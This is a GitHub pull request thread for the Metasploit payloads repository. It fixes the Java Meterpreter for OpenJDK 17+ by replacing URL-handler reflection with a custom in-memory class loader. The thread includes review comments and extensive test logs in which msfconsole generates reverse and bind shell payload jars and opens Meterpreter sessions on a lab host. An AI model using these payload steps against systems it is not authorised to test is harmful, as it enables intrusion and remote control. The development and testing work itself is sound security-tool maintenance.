### PR TITLE
OpenJDK reflection fix

### LINKED ISSUE #647: Java meterpreter no longer working with openjdk 17+ due to reflection changes
### Problem

Java Meterpreter no longer works with openjdk17+ due to changes in jdk 9's reflection policy:

```
java.lang.reflect.InaccessibleObjectException: Unable to make field static java.util.Hashtable java.net.URL.handlers accessible: module java.base does not "opens java.net" to unnamed module @2a84aee7

```

### Current behavior

The following code no longer works with open jdk17+ - which adds support for [`new URL("metasploitmembuff", "", (files.size() - 1) + "/" + contentType);`](https://github.com/rapid7/metasploit-payloads/blob/4bd1fbe0c70f51fb0f64150f032747d8ca044a0a/java/javapayload/src/main/java/com/metasploit/meterpreter/MemoryBufferURLConnection.java#L73)

https://github.com/rapid7/metasploit-payloads/blob/4bd1fbe0c70f51fb0f64150f032747d8ca044a0a/java/javapayload/src/main/java/com/metasploit/meterpreter/MemoryBufferURLConnection.java#L23-L65

Stack trace caught [here](https://github.com/rapid7/metasploit-payloads/blob/4bd1fbe0c70f51fb0f64150f032747d8ca044a0a/java/javapayload/src/main/java/com/metasploit/meterpreter/MemoryBufferURLConnection.java#L63)

```
java.lang.reflect.InaccessibleObjectException: Unable to make field static java.util.Hashtable java.net.URL.handlers accessible: module java.base does not "opens java.net" to unnamed module @2a84aee7
	at java.base/java.lang.reflect.AccessibleObject.checkCanSetAccessible(AccessibleObject.java:354)
	at java.base/java.lang.reflect.AccessibleObject.checkCanSetAccessible(AccessibleObject.java:297)
	at java.base/java.lang.reflect.Field.checkCanSetAccessible(Field.java:180)
	at java.base/java.lang.reflect.Field.setAccessible(Field.java:174)
	at com.metasploit.meterpreter.MemoryBufferURLConnection.<clinit>(Unknown Source)
	at javapayload.stage.Meterpreter.start(Unknown Source)
	at java.base/jdk.internal.reflect.DirectMethodHandleAccessor.invoke(DirectMethodHandleAccessor.java:104)
	at java.base/java.lang.reflect.Method.invoke(Method.java:577)
	at metasploit.Payload.bootstrap(Unknown Source)
	at metasploit.Payload.main(Unknown Source)


```

### Context

It's not possible to use reflection on java.net.URL now in JDK17+

Example code:

```java
import java.net.URL;
import java.lang.reflect.Field;

public class MyClass {
    public static void main(String args[]) throws NoSuchFieldException {
      Field field = URL.class.getDeclaredField("handlers");
      field.setAccessible(true);
 
      System.out.println(field);
    }
}
```

Example output JDK11.0.4 - https://www.jdoodle.com/online-java-compiler/ - a warning happens on the `setAccessible` call, but it works:

```
static java.util.Hashtable java.net.URL.handlers

WARNING: An illegal reflective access operation has occurred
WARNING: Illegal reflective access by MyClass (file:/home/) to field java.net.URL.handlers
WARNING: Please consider reporting this to the maintainers of MyClass
WARNING: Use --illegal-access=warn to enable warnings of further illegal reflective access operations
WARNING: All illegal access operations will be denied in a future release
```

Example JDK17.01 - https://www.jdoodle.com/online-java-compiler/ - an exception is immediately raised:

```

Exception in thread "main" java.lang.reflect.InaccessibleObjectException: Unable to make field static java.util.Hashtable java.net.URL.handlers accessible: module java.base does not "opens java.net" to unnamed module @442d9b6e
	at java.base/java.lang.reflect.AccessibleObject.checkCanSetAccessible(AccessibleObject.java:354)
	at java.base/java.lang.reflect.AccessibleObject.checkCanSetAccessible(AccessibleObject.java:297)
	at java.base/java.lang.reflect.Field.checkCanSetAccessible(Field.java:178)
	at java.base/java.lang.reflect.Field.setAccessible(Field.java:172)
	at MyClass.main(MyClass.java:7)
```

### Potential solution

I looked into deleting the current static block with reflection on java.net.URL's handlers, and instead using a `MemoryBufferURLStreamHandlerFactory` implementation:

```diff
-         new URLClassLoader(new URL[]{coreURL}, getClass().getClassLoader()).loadClass("com.metasploit.meterpreter.Meterpreter").getConstructor(new Class[]{DataInputStream.class, OutputStream.class, boolean.class, boolean.class}).newInstance(in, out, Boolean.TRUE, Boolean.valueOf(!noRedirectError));

+        new URLClassLoader(new URL[]{coreURL}, getClass().getClassLoader(), MemoryBufferURLStreamHandlerFactory.getInstance()).loadClass("com.metasploit.meterpreter.Meterpreter").getConstructor(new Class[]{DataInputStream.class, OutputStream.class, boolean.class, boolean.class}).newInstance(in, out, Boolean.TRUE, Boolean.valueOf(!noRedirectError));

```

And updating the Metasploit side to send the new class:

https://github.com/rapid7/metasploit-framework/blob/f89de600be578712f302a34c5b80aab92d4d3f01/lib/msf/core/payload/java/meterpreter_loader.rb#L80-L96

```diff
  def stage_class_files
    # Order matters.  Classes can only reference classes that have already
    # been sent.  The last .class must implement Stage, i.e. have a start()
    # method.
    #
    # The Meterpreter.class stage is just a jar loader, not really anything
    # to do with meterpreter specifically.  This payload should eventually
    # be replaced with an actual meterpreter stage so we don't have to send
    # a second jar.
    [
      [ "javapayload", "stage", "Stage.class" ],
      [ "com", "metasploit", "meterpreter", "MemoryBufferURLConnection.class" ],
      [ "com", "metasploit", "meterpreter", "MemoryBufferURLStreamHandler.class" ],
+     [ "com", "metasploit", "meterpreter", "MemoryBufferURLStreamHandlerFactory.class" ],
      # Must be last!
      [ "javapayload", "stage", "Meterpreter.class" ],
    ]
  end
```

I separely tried to pass in a custom connection handler in the [createURL](https://github.com/rapid7/metasploit-payloads/blob/4bd1fbe0c70f51fb0f64150f032747d8ca044a0a/java/javapayload/src/main/java/com/metasploit/meterpreter/MemoryBufferURLConnection.java#L70-L75) implementation, via this [overload](https://docs.oracle.com/javase/8/docs/api/java/net/URL.html#URL-java.lang.String-java.lang.String-int-java.lang.String-java.net.URLStreamHandler-)

```diff
-             return new URL("metasploitmembuff", "", (files.size() - 1) + "/" + contentType);
+             return new URL("metasploitmembuff", "", -1, (files.size() - 1) + "/" + contentType, new MemoryBufferURLStreamHandler(files));

```

But neither approaches quite work from the cycles I spent

### Replication steps

Open msfconsole; Set lhost/port:

```
msf6 payload(java/meterpreter/reverse_tcp) > set lhost 192.168.123.1
lhost => 192.168.123.1
msf6 payload(java/meterpreter/reverse_tcp) > set lport 6007
lport => 6007

```

Generate a payload:

```
msf6 payload(java/meterpreter/reverse_tcp) > generate -o child-process-rb-java-meterpreter-reverse-tcp20230512-2596-t5xc7u.jar -f jar AutoVerifySessionTimeout=10 spawn=0 lport=6007 lhost=192.168.123.1
Sending payload path /Users/user/Documents/code/metasploit-framework/data/java
Sending payload path /Users/user/Documents/code/metasploit-framework/data/java
[*] Writing 5263 bytes to child-process-rb-java-meterpreter-reverse-tcp20230512-2596-t5xc7u.jar...

```

Run a handler:

```
msf6 payload(java/meterpreter/reverse_tcp) > to_handler
Sending payload path /Users/user/Documents/code/metasploit-framework/data/java
[*] Payload Handler Started as Job 4

[*] Started reverse TCP handler on 192.168.123.1:6007 

```

Run the jar:

```
$ java --version
openjdk 18.0.1 2022-04-19
OpenJDK Runtime Environment Homebrew (build 18.0.1+0)
OpenJDK 64-Bit Server VM Homebrew (build 18.0.1+0, mixed mode, sharing)
$ java -jar ./child-process-rb-java-meterpreter-reverse-tcp20230512-2596-t5xc7u.jar


```

See the connection die:

```
msf6 payload(java/meterpreter/reverse_tcp) > Sending payload path 
[*] Sending stage (61197 bytes) to 192.168.123.1
[-] Meterpreter session 7 is not valid and will be closed
[*] 192.168.123.1 - Meterpreter session 7 closed.
```

But work with java 1.8

```
$ ✗ export JAVA_HOME=/Library/Java/JavaVirtualMachines/openjdk-8.jdk/Contents/Home

$ java -version
openjdk version "1.8.0_312"
OpenJDK Runtime Environment (build 1.8.0_312-bre_2021_10_20_23_15-b00)
OpenJDK 64-Bit Server VM (build 25.312-b00, mixed mode)
➜  metasploit-framework git:(6b101b5a4d) ✗ java -jar ./child-process-rb-java-meterpreter-reverse-tcp20230512-2596-t5xc7u.jar
```

Session opened with java 1.8 runtime:

```
msf6 payload(java/meterpreter/reverse_tcp) >
[*] Sending stage (61197 bytes) to 192.168.123.1
[*] Meterpreter session 8 opened (192.168.123.1:6007 -> 192.168.123.1:50120) at 2023-05-23 00:06:22 +0100
```

### PR DESCRIPTION
**Pull request by smashery**
This PR aims to resolve #647 - allowing the Java Meterpreter to run on the latest OpenJDK. 

Contract-breaking reflection (i.e. forcibly changing private fields to be public, then calling them) was prevented in this JDK; this was previously used to hijack the URL Class Loading process to have "URLs" to in-memory resources. 

The new approach avoids the use of `URLClassLoaders` entirely, since (being unable to use the standard global `URLStreamHandlerFactory` for risk of conflicting with whatever application we're injecting into), we seem to need to do some hackery to have the `URL` class handle an "in-memory URL protocol". Without the use of invasive reflection, I found it much easier to do away with that entirely, and just have our own `ClassLoader` type. We get more control that way.

Testing/landing this work requires a corresponding PR in the metasploit-framework repo, to just send the correct class file(s) to the stager. You'll need to checkout the appropriate branch, and `make` from this repo's directory to set up the test situation. That PR is here: https://github.com/rapid7/metasploit-framework/pull/18355

I've tested it back to Java 1.5, which worked (although the HTTPS payload failed; Wireshark indicated it was probably a SSL versioning error; maybe new ruby doesn't support the old java ciphers?).

The README in this repo says that this payload should work on JRE 1.2, but the existing payload files didn't seem to work on that Java version(`Exception in thread "main" java.lang.UnsupportedClassVersionError: metasploit/Payload (Unsupported major.minor version 49.0)`). The build process only seems to check back to 1.5; so I'm assuming the actual back-compat requirement is 1.5.

Test cases:
- Run payloads on the latest OpenJDK
- Verify it still works on old JDK instances.
- Verify each of the payload types result in a usable shell (bind and reverse; shell and meterp; and the one staged payload: bind shell)
- Verify interactivity works with each of them.

### CODE REVIEW

File: java/javapayload/src/main/java/com/metasploit/meterpreter/JarFileClassLoader.java [hunk 1]
```diff
@@ -50,6 +50,12 @@ public Class findClass(String name) throws ClassNotFoundException {
 
     @Override
     public Class loadClass(String name) throws ClassNotFoundException {
+        // The dynamic loading requires knowledge of this classloader, but
+        // the default classloader doesn't know about it; so we bridge that
+        // gap by returning our own class when requested.
```
Comment (schierlm) [inline java/javapayload/src/main/java/com/metasploit/meterpreter/JarFileClassLoader.java:55]: Without having tested it: It should also work if you pass the classloader that loaded this class (i.e. `javapayload.stage.Meterpreter.class.getClassLoader()` as parent class loader to your current one. Would also have the advantage that you have access to classes loaded inside the container that loaded your Meterpreter (i.e. the webapp that contained your JSP payload in case of exploiting a Tomcat vulnerability). Not sure if you need that, though.

File: java/javapayload/src/main/java/com/metasploit/meterpreter/JarFileClassLoader.java [hunk 2]
```diff
@@ -0,0 +1,66 @@
...
+    HashMap<String, byte[]> resourceBytes = new HashMap();
+
+    public void addJarFile(byte[] jarFile) throws java.io.IOException {
+        ZipInputStream zipReader = new ZipInputStream(new ByteArrayInputStream(jarFile));
+        ZipEntry zipEntry;
+        while ((zipEntry = zipReader.getNextEntry()) != null) {
+            String name = zipEntry.getName();
+            String packagedName = name;
+            ByteArrayOutputStream resourceStream = new ByteArrayOutputStream();
+            final byte[] bytes = new byte[10000];
```
Comment (schierlm) [inline java/javapayload/src/main/java/com/metasploit/meterpreter/JarFileClassLoader.java:21]: You could reduce GC pressure slightly by declaring this variable outside the loop.

Comment (schierlm) [reply java/javapayload/src/main/java/com/metasploit/meterpreter/JarFileClassLoader.java:21]: I really like that solution. I believe there used to be a problem when being used in context with a security manager in older Java versions (since your "simple" class loader passes a `null` ProtectionDomain) - on the other hand all "recent" (JDK1.4+) Java exploits I know either run without SecurityManager or disable it as one of their first actions.

If you wonder what happened to Java 1.2 compatibility - it got lost by the Android rework in 
https://github.com/rapid7/metasploit-payloads/commit/567ffadf5ae2f94beddbab1fea0e0317696b1bd8#diff-d8225ebcfc11b480a6e4f54e183b67c3ead51635a167c106d928c2abf1f9ef66L29-R30

Seems that the documentation did not get updated - and also some version-dependent commands could lose their restriction or implementations for older versions:
https://github.com/rapid7/metasploit-payloads/blob/master/java/meterpreter/stdapi/src/main/java/com/metasploit/meterpreter/stdapi/Loader.java

**Review by schierlm — APPROVED** [review]

File: java/javapayload/src/main/java/com/metasploit/meterpreter/JarFileClassLoader.java (hunk 1 above)
Comment (smashery) [reply java/javapayload/src/main/java/com/metasploit/meterpreter/JarFileClassLoader.java:55]: Ah, great - yeah, that makes sense. I've made that change - thanks!

**Comment by smashery** [comment]
Thanks for the comments @schierlm - I've neatened up both of those items.

**Comment by jheysel-r7** [comment]
Thanks for the PR @smashery. I've done some testing. I experienced a couple of minor issues trying to build the java payloads with OpenJDK 17.0.8.1, but once those were resolved everything worked as expected on all the versions of JDK I tested. 

# Build issues and temporary workarounds 

The following issues were only experienced when running OpenJDK 17

1. When running `make` inside `metasploit-payloads` I was getting the following error:
`[ERROR] Source option 5 is no longer supported. Use 7 or later.`
So I changed all instances of`<source>1.5</source>` and ` <target>1.5</target>`  to `1.7` which  resolved the issue.

<details>
<summary>Console output</summary>

<p>

```
➜  metasploit-payloads git:(land-672) ✗ make
Installing Windows payloads
Note: Windows 32-bit not built, skipping
Note: Windows 64-bit not built, skipping
Installing Java payloads
[ERROR] COMPILATION ERROR :
[ERROR] Source option 5 is no longer supported. Use 7 or later.
[ERROR] Target option 5 is no longer supported. Use 7 or later.
[ERROR] Failed to execute goal org.apache.maven.plugins:maven-compiler-plugin:3.0:compile (default-compile) on project Metasploit-JavaPayload: Compilation failure: Compilation failure:
[ERROR] Source option 5 is no longer supported. Use 7 or later.
[ERROR] Target option 5 is no longer supported. Use 7 or later.
[ERROR] -> [Help 1]
[ERROR]
[ERROR] To see the full stack trace of the errors, re-run Maven with the -e switch.
[ERROR] Re-run Maven using the -X switch to enable full debug logging.
[ERROR]
[ERROR] For more information about the errors and possible solutions, please read the following articles:
[ERROR] [Help 1] http://cwiki.apache.org/confluence/display/MAVEN/MojoFailureException
[ERROR]
[ERROR] After correcting the problems, you can resume the build with the command
[ERROR]   mvn <args> -rf :Metasploit-JavaPayload
make: *** [Makefile:28: install-java] Error 1
```

</p>

</details>


2. After the above was temporary resolved I encountered the following:
```
[ERROR] Failed to execute goal org.apache.maven.plugins:maven-antrun-plugin:1.7:run (default) on project Metasploit-Java-Meterpreter: An Ant BuildException has occured: Unparseable date: "01/01/2000 00:00 AM"
[ERROR] around Ant part ...<touch datetime="01/01/2000 00:00 AM">... @ 6:41 in /home/msfuser/git/metasploit-payloads/java/meterpreter/meterpreter/target/antrun/build-main.xml
```
So I deleted all instances of `touch datetime` and the build succeeded. 

<details>
<summary>Console output</summary>

<p>

```
[INFO] ------------------------------------------------------------------------
[INFO] Reactor Summary for JavaPayload for Metasploit (Parent project) 1-SNAPSHOT:
[INFO]
[INFO] JavaPayload for Metasploit (Parent project) ........ SUCCESS [  0.004 s]
[INFO] JavaPayload for Metasploit ......................... SUCCESS [  8.858 s]
[INFO] Java Meterpreter (Parent project) .................. SUCCESS [  0.007 s]
[INFO] Java Meterpreter Shared ............................ SUCCESS [  0.458 s]
[INFO] Java Meterpreter ................................... FAILURE [  1.271 s]
[INFO] Java Meterpreter StdApi Plugin ..................... SKIPPED
[INFO] Java Meterpreter Debug Loader ...................... SKIPPED
[INFO] Java Meterpreter extension archetype ............... SKIPPED
[INFO] JavaPayload Compatibility Checks (Parent project) .. SKIPPED
[INFO] JavaPayload Compatibility Checks (Java 1.6) ........ SKIPPED
[INFO] JavaPayload Compatibility Checks (Java 1.5) ........ SKIPPED
[INFO] JavaPayload Compatibility Checks (Android API) ..... SKIPPED
[INFO] ------------------------------------------------------------------------
[INFO] BUILD FAILURE
[INFO] ------------------------------------------------------------------------
[INFO] Total time:  11.025 s
[INFO] Finished at: 2023-10-02T14:30:37-08:00
[INFO] ------------------------------------------------------------------------
[ERROR] Failed to execute goal org.apache.maven.plugins:maven-antrun-plugin:1.7:run (default) on project Metasploit-Java-Meterpreter: An Ant BuildException has occured: Unparseable date: "01/01/2000 00:00 AM"
[ERROR] around Ant part ...<touch datetime="01/01/2000 00:00 AM">... @ 6:41 in /home/msfuser/git/metasploit-payloads/java/meterpreter/meterpreter/target/antrun/build-main.xml
[ERROR] -> [Help 1]
[ERROR]
[ERROR] To see the full stack trace of the errors, re-run Maven with the -e switch.
[ERROR] Re-run Maven using the -X switch to enable full debug logging.
[ERROR]
[ERROR] For more information about the errors and possible solutions, please read the following articles:
[ERROR] [Help 1] http://cwiki.apache.org/confluence/display/MAVEN/MojoExecutionException
[ERROR]
[ERROR] After correcting the problems, you can resume the build with the command
[ERROR]   mvn <args> -rf :Metasploit-Java-Meterpreter
make: *** [Makefile:8: android] Error 1
➜  java git:(land-672) ✗ rg "touch datetime"
```

</p>

</details>


<details>
<summary>metapsloit-payloads git diff in order to build successfully on JDK 17</summary>

<p>

```
diff --git a/java/meterpreter/extension-archetype/src/main/resources/archetype-resources/pom.xml b/java/meterpreter/extension-archetype/src/main/resources/archetype-resources/pom.xml
index a1d5b635..ef5a0e48 100644
--- a/java/meterpreter/extension-archetype/src/main/resources/archetype-resources/pom.xml
+++ b/java/meterpreter/extension-archetype/src/main/resources/archetype-resources/pom.xml
@@ -76,9 +76,6 @@
                                                                        <target>
                                                                                <mkdir dir="${project.basedir}/target/tmp" />
                                                                                <unzip src="${project.basedir}/target/${project.build.finalName}.jar" dest="${project.basedir}/target/tmp" />
-                                                                               <touch datetime="01/01/2000 00:00 AM">
-                                                                                       <fileset dir="${project.basedir}/target/tmp" includes="**/*" />
-                                                                               </touch>
                                                                                <delete file="${project.basedir}/../../${deploy.path}/data/meterpreter/${project.build.finalName}.jar" />
                                                                                <zip destfile="${project.basedir}/../../${deploy.path}/data/meterpreter/${project.build.finalName}.jar">
                                                                                        <fileset dir="${project.basedir}/target/tmp" includes="META-INF/**" />
diff --git a/java/meterpreter/meterpreter/pom.xml b/java/meterpreter/meterpreter/pom.xml
index 3bdc4366..4ee26502 100644
--- a/java/meterpreter/meterpreter/pom.xml
+++ b/java/meterpreter/meterpreter/pom.xml
@@ -68,9 +68,6 @@
                                                                        <target>
                                                                                <mkdir dir="${project.basedir}/target/tmp" />
                                                                                <unzip src="${project.basedir}/target/${project.build.finalName}.jar" dest="${project.basedir}/target/tmp" />
-                                                                               <touch datetime="01/01/2000 00:00 AM">
-                                                                                       <fileset dir="${project.basedir}/target/tmp" includes="**/*" />
-                                                                               </touch>
                                                                                <delete file="${project.basedir}/../../${deploy.path}/data/meterpreter/${project.build.finalName}.jar"/>
                                                                                <zip destfile="${project.basedir}/../../${deploy.path}/data/meterpreter/${project.build.finalName}.jar">
                                                                                        <fileset dir="${project.basedir}/target/tmp" includes="META-INF/**" />
diff --git a/java/meterpreter/stdapi/pom.xml b/java/meterpreter/stdapi/pom.xml
index d90a7c0d..d2ea67bc 100644
--- a/java/meterpreter/stdapi/pom.xml
+++ b/java/meterpreter/stdapi/pom.xml
@@ -80,9 +80,6 @@
                                                                        <target>
                                                                                <mkdir dir="${project.basedir}/target/tmp" />
                                                                                <unzip src="${project.basedir}/target/${project.build.finalName}.jar" dest="${project.basedir}/target/tmp" />
-                                                                               <touch datetime="01/01/2000 00:00 AM">
-                                                                                       <fileset dir="${project.basedir}/target/tmp" includes="**/*" />
-                                                                               </touch>
                                                                                <delete file="${project.basedir}/../../${deploy.path}/data/meterpreter/${project.build.finalName}.jar"/>
                                                                                <zip destfile="${project.basedir}/../../${deploy.path}/data/meterpreter/${project.build.finalName}.jar">
                                                                                        <fileset dir="${project.basedir}/target/tmp" includes="META-INF/**" />
diff --git a/java/pom.xml b/java/pom.xml
index 3610dcff..9cacee1f 100644
--- a/java/pom.xml
+++ b/java/pom.xml
@@ -26,8 +26,8 @@
                                <artifactId>maven-compiler-plugin</artifactId>
                                <version>3.0</version>
                                <configuration>
-                                       <source>1.5</source>
-                                       <target>1.5</target>
+                                       <source>1.7</source>
+                                       <target>1.7</target>
                                        <debug>true</debug> <!-- http://stackoverflow.com/q/4220083/90203 -->
                                        <debuglevel>none</debuglevel>
                                </configuration>
diff --git a/java/version-compatibility-check/android-api/pom.xml b/java/version-compatibility-check/android-api/pom.xml
index 610be7e6..7df1f751 100644
--- a/java/version-compatibility-check/android-api/pom.xml
+++ b/java/version-compatibility-check/android-api/pom.xml
@@ -25,8 +25,8 @@
                                <artifactId>maven-compiler-plugin</artifactId>
                                <version>3.0</version>
                                <configuration>
-                                       <source>1.5</source>
-                                       <target>1.5</target>
+                                       <source>1.7</source>
+                                       <target>1.7</target>
                                </configuration>
                        </plugin>
                        <plugin>
```
</p>

</details>


# Testing Results
## OpenJDK 17   (openjdk version "17.0.8.1" 2023-08-24)
- [x] java/meterpreter/bind_tcp                         
- [x] java/meterpreter/reverse_tcp                  
- [x] java/meterpreter/reverse_http
- [x] java/meterpreter/reverse_https
- [x] java/shell/bind_tcp       
- [x] java/shell/reverse_tcp               
- [x] java/shell_reverse_tcp 

## OpenJDK 1.8 (build 1.8.0_43-b03)
- [x] java/meterpreter/bind_tcp                         
- [x] java/meterpreter/reverse_tcp                  
- [x] java/meterpreter/reverse_http
- [x] java/meterpreter/reverse_https
- [x] java/shell/bind_tcp       
- [x] java/shell/reverse_tcp               
- [x] java/shell_reverse_tcp 

## openjdk-7u75-b13-linux-x64-18_dec_2014.tar

I was looking to test JDK 1.5, was having trouble finding a binary, the oldest JDK I could find was 1.7 here: https://jdk.java.net/java-se-ri/7 and when trying to build the java payloads I was seeing the same `Unsupported major.minor` version as stated in the PR description when trying to build metasploit-payloads. 

<details>
<summary>OpenJDK 1.7 Unsupported major.minor build error</summary>

<p>


```
➜  java git:(land-672) make
mvn package -Dandroid.sdk.path= -Dandroid.release=true -P deploy
Exception in thread "main" java.lang.UnsupportedClassVersionError: org/codehaus/plexus/classworlds/launcher/Launcher : Unsupported major.minor version 52.0
	at java.lang.ClassLoader.defineClass1(Native Method)
	at java.lang.ClassLoader.defineClass(ClassLoader.java:800)
	at java.security.SecureClassLoader.defineClass(SecureClassLoader.java:142)
	at java.net.URLClassLoader.defineClass(URLClassLoader.java:449)
	at java.net.URLClassLoader.access$100(URLClassLoader.java:71)
	at java.net.URLClassLoader$1.run(URLClassLoader.java:361)
	at java.net.URLClassLoader$1.run(URLClassLoader.java:355)
	at java.security.AccessController.doPrivileged(Native Method)
	at java.net.URLClassLoader.findClass(URLClassLoader.java:354)
	at java.lang.ClassLoader.loadClass(ClassLoader.java:425)
	at sun.misc.Launcher$AppClassLoader.loadClass(Launcher.java:308)
	at java.lang.ClassLoader.loadClass(ClassLoader.java:358)
	at sun.launcher.LauncherHelper.checkAndLoadMain(LauncherHelper.java:482)
make: *** [Makefile:8: android] Error 1
➜  java git:(land-672) java -version
openjdk version "1.7.0_75"
OpenJDK Runtime Environment (build 1.7.0_75-b13)
OpenJDK 64-Bit Server VM (build 24.75-b04, mixed mode)
```


</p>

</details>


Due to this is decided to grab the oldest 1.8 JDK i could find in order verify it still works on old JDK instances. Please let me know if you think I should be testing an older JDK. 



# Testing Output

<details>
<summary>A whole lot of output from the successful tests mentioned above</summary>

<p>

#### OpenJDK 17   (openjdk version "17.0.8.1" 2023-08-24)

 java/meterpreter/reverse_tcp

```
msf6 >  use java/meterpreter/reverse_tcp
msf6 payload(java/meterpreter/reverse_tcp) > set lhost 172.16.199.158
lhost => 172.16.199.158
msf6 payload(java/meterpreter/reverse_tcp) > set lport 6007
lport => 6007
msf6 payload(java/meterpreter/reverse_tcp) > generate -o child-process-rb-java-meterpreter-reverse-tcp20230512-2596-t5xc7u.jar -f jar AutoVerifySessionTimeout=10 spawn=0 lport=6007 lhost=172.16.199.158
WARNING: Local file /home/msfuser/git/metasploit-framework/data/java is being used
WARNING: Local files may be incompatible with the Metasploit Framework
WARNING: Local file /home/msfuser/git/metasploit-framework/data/java is being used
[*] Writing 5701 bytes to child-process-rb-java-meterpreter-reverse-tcp20230512-2596-t5xc7u.jar...
msf6 payload(java/meterpreter/reverse_tcp) > to_handler
WARNING: Local file /home/msfuser/git/metasploit-framework/data/java is being used
[*] Payload Handler Started as Job 0

[*] Started reverse TCP handler on 172.16.199.158:6007
```


```
➜  metasploit-framework git:(d2f5d06d1c) ✗ java -version
openjdk version "17.0.8.1" 2023-08-24
OpenJDK Runtime Environment (build 17.0.8.1+1-Ubuntu-0ubuntu120.04)
OpenJDK 64-Bit Server VM (build 17.0.8.1+1-Ubuntu-0ubuntu120.04, mixed mode, sharing)
➜  metasploit-framework git:(d2f5d06d1c) ✗ java -jar ./child-process-rb-java-meterpreter-reverse-tcp20230512-2596-t5xc7u.jar
```


```
WARNING: Local file /home/msfuser/git/metasploit-framework/data/meterpreter/meterpreter.jar is being used
WARNING: Local file /home/msfuser/git/metasploit-framework/data/java/javapayload/stage/Stage.class is being used
WARNING: Local file /home/msfuser/git/metasploit-framework/data/java/javapayload/stage/Meterpreter.class is being used
[*] Sending stage (60483 bytes) to 172.16.199.158
WARNING: Local file /home/msfuser/git/metasploit-framework/data/meterpreter/ext_server_stdapi.jar is being used
[*] Meterpreter session 1 opened (172.16.199.158:6007 -> 172.16.199.158:47198) at 2023-10-02 16:00:04 -0800

msf6 payload(java/meterpreter/reverse_tcp) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: msfuser
meterpreter > sysinfo
Computer        : ubuntu
OS              : Linux 5.15.0-84-generic (amd64)
Architecture    : x64
System Language : en_US
Meterpreter     : java/linux
```

java/meterpreter/bind_tcp   

```
msf6 payload(java/meterpreter/bind_tcp) > set rhosts 172.16.199.158
[!] Unknown datastore option: rhosts. Did you mean RHOST?
rhosts => 172.16.199.158
msf6 payload(java/meterpreter/bind_tcp) > set rhost 172.16.199.158
rhost => 172.16.199.158
msf6 payload(java/meterpreter/bind_tcp) > generate -o child-process-rb-java-meterpreter-bind-tcp20230512-2596-t5xc7u.jar-2596-t5xc7u.jar -f jar AutoVerifySessionTimeout=10 spawn=0 lport=4444 rhost=172.16.199.158
WARNING: Local file /home/msfuser/git/metasploit-framework/data/java is being used
WARNING: Local file /home/msfuser/git/metasploit-framework/data/java is being used
[*] Writing 5680 bytes to child-process-rb-java-meterpreter-bind-tcp20230512-2596-t5xc7u.jar-2596-t5xc7u.jar...
msf6 payload(java/meterpreter/bind_tcp) > to_handler
WARNING: Local file /home/msfuser/git/metasploit-framework/data/java is being used
[*] Payload Handler Started as Job 1

[*] Started bind TCP handler against 172.16.199.158:4444
msf6 payload(java/meterpreter/bind_tcp) > WARNING: Local file /home/msfuser/git/metasploit-framework/data/meterpreter/meterpreter.jar is being used
WARNING: Local file /home/msfuser/git/metasploit-framework/data/java/javapayload/stage/Stage.class is being used
WARNING: Local file /home/msfuser/git/metasploit-framework/data/java/javapayload/stage/Meterpreter.class is being used
[*] Sending stage (60483 bytes) to 172.16.199.158
WARNING: Local file /home/msfuser/git/metasploit-framework/data/meterpreter/ext_server_stdapi.jar is being used
[*] Meterpreter session 2 opened (172.16.199.158:46555 -> 172.16.199.158:4444) at 2023-10-02 16:36:55 -0800

msf6 payload(java/meterpreter/bind_tcp) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > sysinfo
Computer        : ubuntu
OS              : Linux 5.15.0-84-generic (amd64)
Architecture    : x64
System Language : en_US
Meterpreter     : java/linux
meterpreter > getuid
Server username: msfuser
meterpreter >
```

java/meterpreter/reverse_http

```
msf6 > use java/meterpreter/reverse_http
msf6 payload(java/meterpreter/reverse_http) > options

Module options (payload/java/meterpreter/reverse_http):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The local listener hostname
   LPORT  8080             yes       The local listener port
   LURI                    no        The HTTP Path


View the full module info with the info, or info -d command.

msf6 payload(java/meterpreter/reverse_http) > set lhost 172.16.199.158
lhost => 172.16.199.158
msf6 payload(java/meterpreter/reverse_http) > generate -o child-process-rb-17-meterpreter-http.jar -f jar
WARNING: Local file /home/msfuser/git/metasploit-framework/data/java is being used
WARNING: Local files may be incompatible with the Metasploit Framework
WARNING: Local file /home/msfuser/git/metasploit-framework/data/java is being used
[*] Writing 5905 bytes to child-process-rb-17-meterpreter-http.jar...
msf6 payload(java/meterpreter/reverse_http) > to_handler
WARNING: Local file /home/msfuser/git/metasploit-framework/data/java is being used
[*] Payload Handler Started as Job 0

[*] Started HTTP reverse handler on http://172.16.199.158:8080
msf6 payload(java/meterpreter/reverse_http) > [!] http://172.16.199.158:8080 handling request from 172.16.199.158; (UUID: xx7crsye) Without a database connected that payload UUID tracking will not work!
WARNING: Local file /home/msfuser/git/metasploit-framework/data/meterpreter/meterpreter.jar is being used
WARNING: Local file /home/msfuser/git/metasploit-framework/data/java/javapayload/stage/Stage.class is being used
WARNING: Local file /home/msfuser/git/metasploit-framework/data/java/javapayload/stage/Meterpreter.class is being used
[*] http://172.16.199.158:8080 handling request from 172.16.199.158; (UUID: xx7crsye) Staging java payload (61016 bytes) ...
[!] http://172.16.199.158:8080 handling request from 172.16.199.158; (UUID: xx7crsye) Without a database connected that payload UUID tracking will not work!
WARNING: Local file /home/msfuser/git/metasploit-framework/data/meterpreter/ext_server_stdapi.jar is being used
[*] Meterpreter session 1 opened (172.16.199.158:8080 -> 172.16.199.158:46856) at 2023-10-03 11:16:47 -0800

msf6 payload(java/meterpreter/reverse_http) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: msfuser
meterpreter > sysinfo
Computer        : ubuntu
OS              : Linux 5.15.0-84-generic (amd64)
Architecture    : x64
System Language : en_US
Meterpreter     : java/linux
meterpreter >
```

java/meterpreter/reverse_https

```
msf6 > use java/meterpreter/reverse_https
msf6 payload(java/meterpreter/reverse_https) > generate -o child-process-rb-java-17-meterpreter-https.jar -f jar
WARNING: Local file /home/msfuser/git/metasploit-framework/data/java is being used
WARNING: Local file /home/msfuser/git/metasploit-framework/data/java is being used
[*] Writing 6822 bytes to child-process-rb-java-17-meterpreter-https.jar...
msf6 payload(java/meterpreter/reverse_https) > to_handler
WARNING: Local file /home/msfuser/git/metasploit-framework/data/java is being used
[*] Payload Handler Started as Job 1
msf6 payload(java/meterpreter/reverse_https) >
[*] Started HTTPS reverse handler on https://172.16.199.158:8443
[!] https://172.16.199.158:8443 handling request from 172.16.199.158; (UUID: vn4qvicn) Without a database connected that payload UUID tracking will not work!
